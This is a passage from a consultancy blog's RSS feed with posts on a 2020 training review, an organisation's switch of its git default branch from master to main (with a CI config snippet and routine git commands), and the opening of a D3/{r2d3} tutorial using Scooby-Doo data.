and we may consider you for an alternative role in our teams!&lt;/p&gt;
&lt;p&gt;If you would like to get in touch directly with any queries then please
email us at &lt;a href="mailto:careers@jumpingrivers.com" rel="external"&gt;careers@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-vacancies-at-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>2020 Training Review</title><link>https://www.jumpingrivers.com/blog/2020-training-review/</link><pubDate>Fri, 22 Oct 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/2020-training-review/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/2020-training-review/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This blog post was written by our intern Osheen Macoscar.&lt;/p&gt;
&lt;p&gt;2020 is a year most of us would like to leave behind. But not all change
is bad, and many interesting developments, especially in education,
happened due to the constraints imposed by COVID. Like many other
training providers, we had to pivot to online learning, which brought
with it challenges but also new opportunities. This review will
hopefully offer some insight into what the year looked like for our
trainers and training course attendees with some key facts and figures
along the way.&lt;/p&gt;
&lt;h1 id="2020-course-stats"&gt;2020 Course Stats&lt;/h1&gt;
&lt;p&gt;Here is a basic overview of all training courses in 2020:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Total number of attendees : &lt;strong&gt;1288&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Total number of courses delivered : &lt;strong&gt;93&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Number of R courses delivered : &lt;strong&gt;77&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Number of Python courses delivered : &lt;strong&gt;15&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have created a few plots which I think help provide some further
insight into our training courses in 2020. They have all been created
using the R package {ggplot2} (which incidentally, you can learn to
master in our &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Advanced Graphics with
R&lt;/a&gt;
course!). This first plot shows the number of attendees across course
start dates, coloured by whether the course was on-site or online.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Attendees_year1.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;I thought this was an interesting plot as it displays the impact of
COVID on the type of courses JR ran in 2020, and the slight increase in
course capacity that came with everything being moved online. It also
shows the temporary break in courses around March 2020 when the national
lockdown was first introduced. You can see that our transition to fully
remote training only took one month and five days!&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/boxplot.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;As a result of COVID, we ran the online courses on Zoom which meant we
had a higher attendee-to-trainer ratio. Due to this, we developed a
bespoke training stack to maintain a high quality of training. This
involved using RStudio Workbench as a way to provide a remote instance
of RStudio on the Cloud. This way, attendees are granted access to the
tutor scripts, exercises, solutions and a pdf copy of the notes. A
measure we implemented in some courses was to add an additional trainer
to assist with the course admin and help answer questions in the Zoom
chat.&lt;/p&gt;
&lt;p&gt;Now, after the first plot you may be wondering what proportion of JR’s
courses were on-site vs online, given that the first online course took
place mid-April. I have created a pie chart showing the proportion of
course locations.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Training_location_pie2.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;As you can see, it is almost exactly a 25/75 split of on-site to online.
This is because there were 23 on-site courses and 70 online courses,
which is pretty impressive considering how new the Jumping Rivers
training team were to running remote training.&lt;/p&gt;
&lt;p&gt;Another interesting topic to investigate was the proportion of courses
run for each language. This was something John covered in the &lt;a href="https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/" rel="external"&gt;2019
training
review&lt;/a&gt;,
so proportions could be compared between the two years.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Course_year3.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;In 2020, Jumping Rivers ended up running 93 courses, only a tiny bit
short of the 95 courses ran in 2019. Predictably, R is still the most
popular language across courses.&lt;/p&gt;
&lt;h1 id="course-popularity"&gt;Course Popularity&lt;/h1&gt;
&lt;h2 id="r-course-numbers"&gt;R Course Numbers&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Course_pop4.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;As you can see from the R course numbers above, unsurprisingly,
“Introduction to R” is the most popular course by a large margin, with a
total of 26 courses in 2020, 20 more than the courses tied for second.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Do you use RStudio Pro? If so, checkout out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;utm_medium=banner&amp;utm_campaign=2020-training-review" rel="external"&gt;managed
RStudio&lt;/a&gt;
services&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="python-course-numbers"&gt;Python Course Numbers&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Pythoncourse_pop5.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;In familiar fashion, we can see that the most popular Python course was
the introductory course, followed closely by “Programming with Python”.
An interesting pattern that can be spotted between the two most
prevalent coding languages, is that the introductory, programming and
visualistaion courses were the three most popular in both!&lt;/p&gt;
&lt;h1 id="trainer-awards"&gt;Trainer Awards&lt;/h1&gt;
&lt;p&gt;Next up we have the 2020 JR trainer awards, where we get to reveal who
taught the most courses and who taught the most attendees respectively.&lt;/p&gt;
&lt;h2 id="most-courses"&gt;Most Courses&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Trainer_courses6.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;Congratulations to Theo on teaching the most courses in 2020, with a
whopping 29 courses, which on average is more than one course every
other week! We also have Rhian on 26 and Jamie on 20 courses
respectively!&lt;/p&gt;
&lt;h2 id="most-attendees"&gt;Most Attendees&lt;/h2&gt;
&lt;img src="https://www.jumpingrivers.com/blog/2020-training-review/Trainer_att7.svg" style="display: block; margin: auto;"&gt;
&lt;p&gt;Unsurprisingly, Theo also wins the award for the most attendees taught
in 2020 having taught 437 people in total!&lt;/p&gt;
&lt;h1 id="final-thoughts"&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;What a unique year 2020 was. I have to say, the team of trainers at
Jumping Rivers handled the transition from on-site to online courses
very smoothly! In fact, even with the one-month transitionary period,
the course numbers were similar to 2019! In August 2021, at the point of
writing, we are running online courses only. However, our plan is
currently to run both online and on-site courses from the turn of the
new year, so stay tuned! You can check our currently available public
courses &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/2020-training-review/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Git: Moving from Master to Main</title><link>https://www.jumpingrivers.com/blog/git-moving-master-to-main/</link><pubDate>Tue, 19 Oct 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/git-moving-master-to-main/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/git-moving-master-to-main/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/git-moving-master-to-main/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In June 2020,
&lt;a href="https://stevenmortimer.com/5-steps-to-change-github-default-branch-from-master-to-main/" rel="external"&gt;GitHub&lt;/a&gt;
announced that is was moving the default branch name from &lt;code&gt;master&lt;/code&gt; to
the more neutral name, &lt;code&gt;main&lt;/code&gt;.
&lt;a href="https://about.gitlab.com/blog/2021/03/10/new-git-default-branch-name/" rel="external"&gt;GitLab&lt;/a&gt;
followed suit in a few months later. &lt;a href="https://twitter.com/tobie/status/1270290278029631489" rel="external"&gt;Tobie
Langel&lt;/a&gt; makes the
salient point on why changing the name is a good thing:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/git-moving-master-to-main/master-to-main-tweet.png" title="Tweet describing master and main" alt="Tweet describing master and main" width="400px" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;So &lt;code&gt;master&lt;/code&gt; is not only racist, it’s also a silly name in the first
place.&lt;/p&gt;
&lt;p&gt;The purpose of this post is summarise some of the challenges we faced
when moving from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;, with the goal that if you decide to
make the same change, you’ll hopefully avoid some of the issues.&lt;/p&gt;
&lt;h2 id="renaming-a-single-repository"&gt;Renaming a Single Repository&lt;/h2&gt;
&lt;p&gt;Renaming a single repository is relatively straightforward. There are
five main steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Copy the master branch and history to &lt;code&gt;main&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Push &lt;code&gt;main&lt;/code&gt; to the remote repository, i.e. GitHub / GitLab&lt;/li&gt;
&lt;li&gt;Point HEAD to the &lt;code&gt;main&lt;/code&gt; branch&lt;/li&gt;
&lt;li&gt;Change the default branch to &lt;code&gt;main&lt;/code&gt; on the remote&lt;/li&gt;
&lt;li&gt;Delete the &lt;code&gt;master&lt;/code&gt; branch on the remote repo&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;There are several nice descriptions on how to change a single
repository. For example, &lt;a href="https://stevenmortimer.com/5-steps-to-change-github-default-branch-from-master-to-main/" rel="external"&gt;Steven
Mortimer&lt;/a&gt;
has a nice blog post that leads you through the process.&lt;/p&gt;
&lt;p&gt;While I’ve read of individuals making the move, I’ve not read about
organisations making the change. I’m sure there are numerous companies
that have made the move, I’ve just not seen them.&lt;/p&gt;
&lt;h2 id="the-jumping-rivers-move"&gt;The Jumping Rivers Move&lt;/h2&gt;
&lt;p&gt;During August 2021, we started renaming our repositories from &lt;code&gt;master&lt;/code&gt;
to &lt;code&gt;main&lt;/code&gt;. We deliberately chose August, because that month is the main
school holiday in the UK. That means most of our clients and team are on
holiday, so the impact of any change was reduced.&lt;/p&gt;
&lt;h2 id="an-overview-of-jumping-rivers-repositories"&gt;An Overview of Jumping Rivers Repositories&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Protected default branches:&lt;/strong&gt; At &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping
Rivers&lt;/a&gt; our default branch (&lt;code&gt;master&lt;/code&gt; /
&lt;code&gt;main&lt;/code&gt;) is protected. This means that we can’t directly push into a
repository. Instead we need to create a branch and merge.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code owners:&lt;/strong&gt; all repositories have a named list of repository
owners. Depending on the repository, this is usually between two and six
people. These are the members of the Jumping Rivers team who have
permission to merge a branch onto the default branch (&lt;code&gt;master&lt;/code&gt; /
&lt;code&gt;main&lt;/code&gt;). The person who made the initial merge request &lt;strong&gt;cannot&lt;/strong&gt; merge
into main. This has to be an additional team member.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Continuous integration:&lt;/strong&gt; all repositories have a CI process. The CI
ranges from very elaborate pipelines to (relatively) simple checks on
the contents of committed files. In order to merge into the default
branch the CI must pass. To avoid copying CI scripts to our
repositories, all CI files are templated. A typically CI file looks
something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yml" data-lang="yml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;include&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# https://repo-url.com/ci-templates/-/blob/master/templates/r-package.yml&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;- &lt;span style="color:#7ee787"&gt;project&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;jumpingrivers/tools/ci-templates&amp;#39;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;ref&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;master&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;file&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;/templates/r-package.yml&amp;#39;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the word “master” appears twice in this code chunk.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RStudio Package Manager (RSPM):&lt;/strong&gt; We use RSPM to manage our R
packages. Currently, any package that is tagged on our GitLab server is
added to our RPSM. We also have neat scripts that &lt;em&gt;automatically&lt;/em&gt; scan
for new repositories and add them to RSPM without any user interaction.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-git-moving-master-to-main"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;&lt;strong&gt;RStudio Connect (RSC) &amp;amp; Shiny Servers:&lt;/strong&gt; We deploy multiple Shiny
applications and markdown documents to RStudio Connect. Likewise, we
have similar pipelines with Shiny Server, Shiny Proxy, etc.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Web page:&lt;/strong&gt; This &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;website&lt;/a&gt; is hosted on
GitLab and deployed via Netlify.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Historical repositories:&lt;/strong&gt; As with many organisations, our standards
have evolved over time. We’ve found that as working as a distributed
team, a consistent repository structure helps us work together. The CI
now enforces, amongst other things&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a README.md file&lt;/li&gt;
&lt;li&gt;a project description file&lt;/li&gt;
&lt;li&gt;a CODEOWNERS file with at least two names&lt;/li&gt;
&lt;li&gt;a “minimum” .gitignore file&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When we go back to an old project, say 12 months ago, we often have to
spend about ten minutes tighten up the repository. For a single project,
this is fine. But a large number of simultaneous projects, this becomes
time consuming.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt; The above points when taken together mean:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Every repo will need to be changed from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;As every repo has a CI process that depends on a &lt;code&gt;master&lt;/code&gt; branch,
every repo will need a minor update to the CI file.&lt;/li&gt;
&lt;li&gt;As every repo has a CODEOWNERS file, this means another team member
will be required to approve and merge any merge request.&lt;/li&gt;
&lt;li&gt;Changing a repository from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt; will also require a
manual change in RSC or RSPM to point a different branch.&lt;/li&gt;
&lt;li&gt;Changing old projects will incur the wrath of the CI, as other
tidying jobs will be required.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="potential-stragies-for-moving"&gt;Potential Stragies for Moving&lt;/h2&gt;
&lt;h3 id="the-hybrid-approach"&gt;The Hybrid Approach&lt;/h3&gt;
&lt;p&gt;Our initial plan was to take a hybrid approach: alter the template CI
process to handle either &lt;code&gt;master&lt;/code&gt; or &lt;code&gt;main&lt;/code&gt;. Then gradually move
repositories across. We decided against this as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;this was going to be a substantial piece of work in itself, which
would ultimately be binned.&lt;/li&gt;
&lt;li&gt;we have a number of Shiny apps that generate overviews of
repositories; this would also need to go into hybrid mode.&lt;/li&gt;
&lt;li&gt;maintaining both a &lt;code&gt;master&lt;/code&gt; &amp;amp; &lt;code&gt;main&lt;/code&gt; version would increase work &amp;amp;
maintenance&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For larger organisations / companies this would be the correct strategy.
I would estimate if we were double our current size, then we would have
taken this route.&lt;/p&gt;
&lt;h3 id="moving-sections"&gt;Moving sections&lt;/h3&gt;
&lt;p&gt;For historical reasons, our training materials and associated
infrastructure live in a semi-independent repository project. As such,
when we did a large notes update to our course notes around Christmas
2020, the training materials moved to &lt;code&gt;main&lt;/code&gt;. Part of this overhaul was
also implementing CODEOWNERS and template CI processes.&lt;/p&gt;
&lt;p&gt;However the non-training repositories are all coupled via the CI
process, so it wasn’t possible to easily move other sections.&lt;/p&gt;
&lt;h3 id="semi-hybrid-approach"&gt;Semi-hybrid Approach&lt;/h3&gt;
&lt;p&gt;We changed the CI template repository from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. As this
is templated across every repository, this means that any changes to a
repository would now fail the CI, unless the CI template file was
updated. This provided a natural method for incorporating changes into
repositories that were being actively used. We also identified key
repositories, where we had to take extra care, for example our Website.&lt;/p&gt;
&lt;p&gt;Next, we encouraged people to rename the protected branches from
&lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. To be honest, I’m not sure how many people listened
to this encouragement. There’s always something more pressing to do!&lt;/p&gt;
&lt;p&gt;About four weeks after the process started, our CI now enforces that the
default branch in a repository must be called &lt;code&gt;main&lt;/code&gt;. Furthermore, if a
&lt;code&gt;master&lt;/code&gt; branch exists, it must be deleted. This approach worked for us,
as we didn’t have (much) critical infrastructure. If a CI job broke for
10 minutes, then no harm was done.&lt;/p&gt;
&lt;p&gt;Our final stage will take place in a couple of months. Where we’ll
systemically work through groups of repos and make the change. For
example, all R packages or all Shiny applications.&lt;/p&gt;
&lt;h2 id="hindsight-is-a-wonderful-thing"&gt;Hindsight is a Wonderful Thing&lt;/h2&gt;
&lt;p&gt;Overall the process wasn’t/isn’t too painful. But with hindsight, we did
make things more difficult than they needed to be. To help anyone else
looking to make this move, here’s a list of things I wish we had
implemented from day 1:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;A clear guide for changing from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt;. This should be
for your organisation, don’t just point to someone else’s blog post.
Ensure you can copy the code and also make the guide easy to find -
don’t just stick it in an email.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If anyone queries that guide, update the guide. Avoid the temptation
to store the answer in slack. Maintain and refer to that single
point of truth.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Remember to include a step for updating a local repo that has been
changed by someone else.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Have a slack channel for the move and use it. We had the first, but
never really used it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;When you delete and then create a protected branch, you should be
clear about the standards within your organisation. We used the
GitLab API to set the various options, e.g. merge method, if code
owner approval is required, can a user force push. However, we had
never decided what these default options should be, so this had to
be documented (a good thing)!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initially when updating RSPM / RSC we made a slack request. This is
a bad idea as it’s easy to get lost in the noise of slack. Instead,
create a merge request and assign it to the correct person. That way
it’s clear what has to be done.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Most (all?) blog posts concentrate on the view of a single
individual. When working in a team if someone updates the default
branch, this obviously impacts everyone else. Once you know this is
going to happen, then you simply run a few standard commands;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git fetch --all &lt;span style="color:#8b949e;font-style:italic"&gt;# update all remotes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git checkout main &lt;span style="color:#8b949e;font-style:italic"&gt;# checkout the new main&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# update local HEAD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/main
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git branch -d master &lt;span style="color:#8b949e;font-style:italic"&gt;# delete local master&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git branch -rd origin/master &lt;span style="color:#8b949e;font-style:italic"&gt;# delete remote master ref&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Our quietest month is followed by our busiest month! This can make
things stressful.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;“We also identified key repositories that had to be updated”. I wish
we had spent more time thinking about this.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;There are also the “unknown unknowns”. Things we just didn’t expect. For
example, we have an internal R package for accessing the gitlab API. The
default branch is &lt;code&gt;master&lt;/code&gt;. Should we change the default or leave it
alone? We want for changing.&lt;/p&gt;
&lt;p&gt;Another annoying issue was when an older repository had issues,
i.e. something wasn’t working. Was this due to the &lt;code&gt;master&lt;/code&gt;/&lt;code&gt;main&lt;/code&gt; or
was it something else?&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In our experience, changing from &lt;code&gt;master&lt;/code&gt; to &lt;code&gt;main&lt;/code&gt; generated around
thirty days of additional work. If we had followed our “hindsight”
section, this could be reduced by around fifteen days. Making the change
is worthwhile and the correct thing to do. But &lt;strong&gt;it will&lt;/strong&gt; break lots of
things. As everything has a CI process and requires a code review at
Jumping Rivers, this meant we never actually broke anything (sort of),
but it did add an unexpected (one-off) barrier to committing to a
project. Another point to note is that the Jumping Rivers team is very
technical. Everyone is familiar with Linux, tweaking CI files, and using
the command line. This is not true of all teams.&lt;/p&gt;
&lt;p&gt;If you are considering moving, then I’m more than happy to chat through
our pain points with you. Just drop me an email at
&lt;a href="mailto:colin@jumpingrivers.com" rel="external"&gt;colin@jumpingrivers.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/git-moving-master-to-main/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Your first D3 visualisation with {r2d3} and Scooby-Doo</title><link>https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/</link><pubDate>Tue, 12 Oct 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;script src="https://d3js.org/d3.v5.js"&gt;&lt;/script&gt;
&lt;script src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/scooby_scripts/data.js"&gt;&lt;/script&gt;
&lt;script src="https://code.jquery.com/jquery-3.6.0.min.js"
integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="https://github.com/jumpingrivers/blog"
style="font-size:25px"&gt;
&lt;img class="image-left"
src="https://www.jumpingrivers.com/blog/r-d3-intro-r2d3/gh_logo.png"
style="width:32px; class:image-left"/&gt;
  Get the code for this blog on GitHub&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="what-is-this-tutorial-and-who-is-it-for"&gt;What is this tutorial and who is it for?&lt;/h2&gt;
&lt;p&gt;This tutorial is aimed mainly at R users who want to learn a bit of D3,
and specifically those who are interested in how you can incorporate D3
into your existing workflows in RStudio. It will gloss over a lot of the
fundamentals of D3 and related topics (JavaScript, CSS, and HTML) to
fast-forward the process of creating your first D3.js visualisation. It
will therefore be far from a comprehensive guide. I’ve tried to include
what I think is important, but if you have absolutely no experience with
any of those topics you will almost definitely be left with some
questions. Hopefully, the satisfaction of creating your first plot will
inspire you to break and tweak the code I have provided to learn more.&lt;/p&gt;
&lt;h2 id="what-is-d3"&gt;What is D3?&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://d3js.org/" rel="external"&gt;D3.js&lt;/a&gt;, or just D3 as it’s more often referred to,
is a JavaScript library used for creating interactive data
visualisations optimised for the web. D3 stands for Data-Driven
Documents. It is commonly used by those who enjoy making creative or
otherwise unusual visualisations as it offers you a great deal of
freedom as well as options for interactivity such as animated
transitions and plot zooming.&lt;/p&gt;
&lt;h2 id="why-should-i-care"&gt;Why should I care?&lt;/h2&gt;
&lt;p&gt;One benefit of D3 is its aforementioned creative control. Another
benefit is that rather than creating raster images (e.g. PNG, JPEG) like
a lot of plotting libraries it renders your figures as SVGs (scalable
vector graphics), which stay crisp no matter how far you zoom in and are
generally faster to load (note: when there are many data points, an SVG
may be slower than a raster image, learn more about which image file
type to use in &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;our blog post on image
formats&lt;/a&gt;).
If you are an R user, you should also care because the {r2d3} package
lets you easily incorporate D3 visualisations into your R workflow, and
use them in e.g. R Markdown reports or R Shiny dashboards.&lt;/p&gt;
&lt;h2 id="is-learning-d3-worth-the-effort"&gt;Is learning D3 worth the effort?&lt;/h2&gt;
&lt;p&gt;The short answer is: it depends. It can be quite tricky and
time-consuming to learn D3 and all associated skills (JavaScript, HTML,
CSS) if you have no previous experience. On the other hand, learning D3
can be a fun way to take your first steps into web development
technologies. Furthermore, you may be perfectly happy with available
plotting libraries in R, e.g. {ggplot2}, as what they offer is indeed
highly flexible and suitable for interactivity. You can even save ggplot
plots as SVG with &lt;code&gt;ggsave()&lt;/code&gt; and &lt;code&gt;svglite&lt;/code&gt;. Therefore, I don’t think
learning D3 is a necessity for data visualisation, but it can be an
addition to your skill set and can be a great first step into creative
coding or web development.&lt;/p&gt;
&lt;h2 id="what-is-r2d3"&gt;What is {r2d3}?&lt;/h2&gt;
&lt;p&gt;If you are still with me, let’s get into {r2d3}.
&lt;a href="https://rstudio.github.io/r2d3/" rel="external"&gt;{r2d3}&lt;/a&gt; is an R package that lets you
create D3 visualisations with R. One way it enhances this process is by
being able to translate between R objects and D3-friendly data
structures. This means that you can clean your data in R, and then just
plot it using D3 without having to go near any data wrangling using
JavaScript. Another cool feature is that you can create D3-rendering
chunks in an R Markdown file that will preview inline, so you can easily
incorporate a D3 visualisation in your reports. You can also easily add
a D3 visualisation to a Shiny app using the &lt;code&gt;renderD3()&lt;/code&gt; and
&lt;code&gt;d3Output()&lt;/code&gt; functions. If you need help with a Shiny Application, we
can
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;utm_medium=banner&amp;utm_campaign=d3-intro" rel="external"&gt;help&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="the-basics"&gt;The basics&lt;/h2&gt;
&lt;p&gt;OK, let’s get set up to create our first D3 visualisation in RStudio.
We’re gonna be using
&lt;a href="https://www.kaggle.com/williamschooleman/scoobydoo-complete" rel="external"&gt;this&lt;/a&gt; fun
dataset on Scooby-Doo manually aggregated by user
&lt;a href="https://www.kaggle.com/williamschooleman/" rel="external"&gt;plummeye&lt;/a&gt;. We are gonna make
a line chart that shows the cumulative total number of monsters caught
by each member of Mystery Incorporated. Then we will add some unique D3
flair to it to make an unusually painful line chart worth it.&lt;/p&gt;
&lt;p&gt;First, you’ll need to install the {r2d3} package as usual.&lt;/p&gt;
